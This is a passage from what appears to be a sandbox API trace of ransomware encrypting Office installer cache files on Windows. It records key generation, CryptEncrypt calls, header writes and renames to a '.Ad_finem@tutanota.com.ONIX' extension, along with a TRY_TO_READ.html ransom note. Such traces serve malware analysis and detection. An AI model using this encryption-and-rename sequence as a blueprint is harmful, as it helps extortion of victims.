Size=0xd5c00) returned 0x2680020 [0123.560] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xd5c00) returned 0x2b30020 [0123.560] SetFilePointer (in: hFile=0x508, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0123.560] ReadFile (in: hFile=0x508, lpBuffer=0x2680020, nNumberOfBytesToRead=0xd5c00, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2680020*, lpNumberOfBytesRead=0x367f44c*=0xd5c00, lpOverlapped=0x0) returned 1 [0123.606] UnlockFile (hFile=0x508, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0xd5c00, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0123.606] CloseHandle (hObject=0x508) returned 1 [0123.607] GetProcessHeap () returned 0x410000 [0123.607] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8e98 | out: hHeap=0x410000) returned 1 [0123.607] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.msi"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.msi.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0123.609] GetProcessHeap () returned 0x410000 [0123.609] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x46a198 | out: hHeap=0x410000) returned 1 [0123.609] FindNextFileW (in: hFindFile=0x4e0c80, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa38b7300, ftCreationTime.dwHighDateTime=0x1cad01b, ftLastAccessTime.dwLowDateTime=0xa38b7300, ftLastAccessTime.dwHighDateTime=0x1cad01b, ftLastWriteTime.dwLowDateTime=0xf01be3d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x543, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Proof.xml", cAlternateFileName="")) returned 1 [0123.609] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x508 [0123.609] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0123.610] LockFile (hFile=0x508, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x543, nNumberOfBytesToLockHigh=0x0) returned 1 [0123.610] SetFilePointerEx (in: hFile=0x508, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0123.610] ReadFile (in: hFile=0x508, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0123.619] SetFilePointerEx (in: hFile=0x508, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0123.619] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0123.620] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x4d8d90 | out: pbBuffer=0x4d8d90) returned 1 [0123.620] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b27a0 | out: pbBuffer=0x4b27a0) returned 1 [0123.620] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml", dwFileAttributes=0x80) returned 1 [0123.620] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml") returned 82 [0123.620] GetProcessHeap () returned 0x410000 [0123.620] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x114) returned 0x46a198 [0123.620] lstrcpyW (in: lpString1=0x46a198, lpString2="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml") returned="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml" [0123.620] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0123.620] GetFileSizeEx (in: hFile=0x508, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=1347) returned 1 [0123.620] SetFilePointer (in: hFile=0x508, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x543 [0123.620] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0123.620] GetProcessHeap () returned 0x410000 [0123.620] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d8e98 [0123.620] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x100) returned 1 [0123.620] WriteFile (in: hFile=0x508, lpBuffer=0x4d8e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8e98*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0123.622] WriteFile (in: hFile=0x508, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0123.623] WriteFile (in: hFile=0x508, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0123.624] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x543) returned 0x4e1b68 [0123.624] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x543) returned 0x4e20b8 [0123.624] SetFilePointer (in: hFile=0x508, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0123.625] ReadFile (in: hFile=0x508, lpBuffer=0x4e1b68, nNumberOfBytesToRead=0x543, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4e1b68*, lpNumberOfBytesRead=0x367f44c*=0x543, lpOverlapped=0x0) returned 1 [0123.625] SetFilePointer (in: hFile=0x508, lDistanceToMove=-1347, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0123.625] WriteFile (in: hFile=0x508, lpBuffer=0x4e20b8*, nNumberOfBytesToWrite=0x543, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4e20b8*, lpNumberOfBytesWritten=0x367f44c*=0x543, lpOverlapped=0x0) returned 1 [0123.626] UnlockFile (hFile=0x508, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x543, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0123.626] CloseHandle (hObject=0x508) returned 1 [0123.626] GetProcessHeap () returned 0x410000 [0123.626] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8e98 | out: hHeap=0x410000) returned 1 [0123.626] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.xml"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.xml.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0123.628] GetProcessHeap () returned 0x410000 [0123.628] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x46a198 | out: hHeap=0x410000) returned 1 [0123.628] FindNextFileW (in: hFindFile=0x4e0c80, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x427f81b0, ftCreationTime.dwHighDateTime=0x1d5f247, ftLastAccessTime.dwLowDateTime=0x427f81b0, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x427f81b0, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x14c4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1 [0123.629] FindNextFileW (in: hFindFile=0x4e0c80, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x427f81b0, ftCreationTime.dwHighDateTime=0x1d5f247, ftLastAccessTime.dwLowDateTime=0x427f81b0, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x427f81b0, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x14c4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0 [0123.629] CloseHandle (hObject=0x3cc) returned 1 [0123.629] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0123.629] GetSystemTime (in: lpSystemTime=0x2a0400 | out: lpSystemTime=0x2a0400*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x3, wDay=0x4, wHour=0x11, wMinute=0x7, wSecond=0x3, wMilliseconds=0x3)) [0123.629] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2b0000 [0123.629] GetWindowsDirectoryW (in: lpBuffer=0x2b0000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0123.629] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2b0200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2b0600, lpMaximumComponentLength=0x2b0608, lpFileSystemFlags=0x2b0604, lpFileSystemNameBuffer=0x2b0400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2b0600*=0x9c354b42, lpMaximumComponentLength=0x2b0608*=0xff, lpFileSystemFlags=0x2b0604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0123.629] wsprintfW (in: param_1=0x2a0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es9c354ca09c354b444c.lock") returned 95 [0123.630] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es9c354ca09c354b444c.lock" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es9c354ca09c354b444c.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x3cc [0123.630] VirtualFree (lpAddress=0x2b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0123.630] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0123.630] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xa0) returned 0x4ded78 [0123.630] FindFirstFileW (in: lpFileName="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\*", lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf4d53d90, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x427f81b0, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x427f81b0, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4e0cc0 [0123.630] FindNextFileW (in: hFindFile=0x4e0cc0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf4d53d90, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x427f81b0, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x427f81b0, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0123.631] FindNextFileW (in: hFindFile=0x4e0cc0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3ba05100, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3ba05100, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf4f690d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xd02aea, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Proof.cab", cAlternateFileName="")) returned 1 [0123.631] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.cab"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x50c [0123.631] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0123.631] LockFile (hFile=0x50c, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0xd02aea, nNumberOfBytesToLockHigh=0x0) returned 1 [0123.631] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0123.631] ReadFile (in: hFile=0x50c, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0123.633] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0123.633] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0123.633] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x4d8d90 | out: pbBuffer=0x4d8d90) returned 1 [0123.633] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b27a0 | out: pbBuffer=0x4b27a0) returned 1 [0123.633] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab", dwFileAttributes=0x80) returned 1 [0123.633] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab") returned 82 [0123.633] GetProcessHeap () returned 0x410000 [0123.633] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x114) returned 0x46a198 [0123.633] lstrcpyW (in: lpString1=0x46a198, lpString2="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab") returned="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab" [0123.633] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0123.633] GetFileSizeEx (in: hFile=0x50c, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=13642474) returned 1 [0123.633] SetFilePointer (in: hFile=0x50c, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0xd02aea [0123.634] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0123.634] GetProcessHeap () returned 0x410000 [0123.634] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d8e98 [0123.634] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x100) returned 1 [0123.634] WriteFile (in: hFile=0x50c, lpBuffer=0x4d8e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8e98*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0123.636] WriteFile (in: hFile=0x50c, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0123.637] WriteFile (in: hFile=0x50c, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0123.638] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xd02aea) returned 0x3680020 [0123.639] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xd02aea) returned 0x4390020 [0123.639] SetFilePointer (in: hFile=0x50c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0123.639] ReadFile (in: hFile=0x50c, lpBuffer=0x3680020, nNumberOfBytesToRead=0xd02aea, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x3680020*, lpNumberOfBytesRead=0x367f44c*=0xd02aea, lpOverlapped=0x0) returned 1 [0124.656] UnlockFile (hFile=0x50c, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0xd02aea, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0124.656] CloseHandle (hObject=0x50c) returned 1 [0124.657] GetProcessHeap () returned 0x410000 [0124.657] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8e98 | out: hHeap=0x410000) returned 1 [0124.657] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.cab"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.cab.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0124.661] GetProcessHeap () returned 0x410000 [0124.661] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x46a198 | out: hHeap=0x410000) returned 1 [0124.661] FindNextFileW (in: hFindFile=0x4e0cc0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3f33d800, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3f33d800, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf4e5c7f0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xd7200, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Proof.msi", cAlternateFileName="")) returned 1 [0124.661] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.msi" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.msi"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x50c [0124.662] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0124.662] LockFile (hFile=0x50c, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0xd7200, nNumberOfBytesToLockHigh=0x0) returned 1 [0124.662] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0124.662] ReadFile (in: hFile=0x50c, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0124.665] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0124.665] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0124.666] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x4d8d90 | out: pbBuffer=0x4d8d90) returned 1 [0124.666] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b27a0 | out: pbBuffer=0x4b27a0) returned 1 [0124.666] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.msi", dwFileAttributes=0x80) returned 1 [0124.666] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.msi") returned 82 [0124.666] GetProcessHeap () returned 0x410000 [0124.666] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x114) returned 0x46a198 [0124.666] lstrcpyW (in: lpString1=0x46a198, lpString2="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.msi" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.msi") returned="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.msi" [0124.666] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.msi", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.msi.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.msi.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0124.666] GetFileSizeEx (in: hFile=0x50c, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=881152) returned 1 [0124.666] SetFilePointer (in: hFile=0x50c, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0xd7200 [0124.666] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0124.666] GetProcessHeap () returned 0x410000 [0124.666] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d8e98 [0124.666] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x100) returned 1 [0124.666] WriteFile (in: hFile=0x50c, lpBuffer=0x4d8e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8e98*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0124.668] WriteFile (in: hFile=0x50c, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0124.670] WriteFile (in: hFile=0x50c, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0124.671] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xd7200) returned 0x2680020 [0124.671] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xd7200) returned 0x2b30020 [0124.672] SetFilePointer (in: hFile=0x50c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0124.672] ReadFile (in: hFile=0x50c, lpBuffer=0x2680020, nNumberOfBytesToRead=0xd7200, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2680020*, lpNumberOfBytesRead=0x367f44c*=0xd7200, lpOverlapped=0x0) returned 1 [0124.723] 